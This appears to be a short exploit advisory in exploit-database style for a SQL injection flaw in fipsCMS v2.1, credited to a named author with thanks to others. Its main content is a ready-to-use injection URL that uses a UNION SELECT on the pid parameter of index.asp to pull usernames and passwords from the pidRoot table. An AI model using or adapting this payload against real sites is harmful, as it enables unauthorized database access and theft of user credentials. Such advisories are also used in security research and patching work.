fipsCMS version 2.1 suffers from a SQL injection vulnerability.
8aef3b132af1d353115b2bd2b418675cf3214907b76a5f620bad2b4b40e0b5f4
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# fipsCMS v2.1 Remote SQL injection Vulnerability // AYYILDIZ.ORG Gururla Sunar ...
# Script: fipsCMS v2.1
# Download: http://fipsasp.com/subs/login/Download.asp?ID=60&CatID=5&AccLvl=0
# Author: iLker Kandemir <ilkerkandemir@mynet.com>
# ThanKs: h0tturk,Ekin0x,Gencnesil,Gencturk,Ajann
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
#
# Exploit:
# /home/index.asp?pid='/**/union/**/select/**/0,username,password,3,4,5,6,7,8,9/**/from/**/pidRoot/**/
#
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #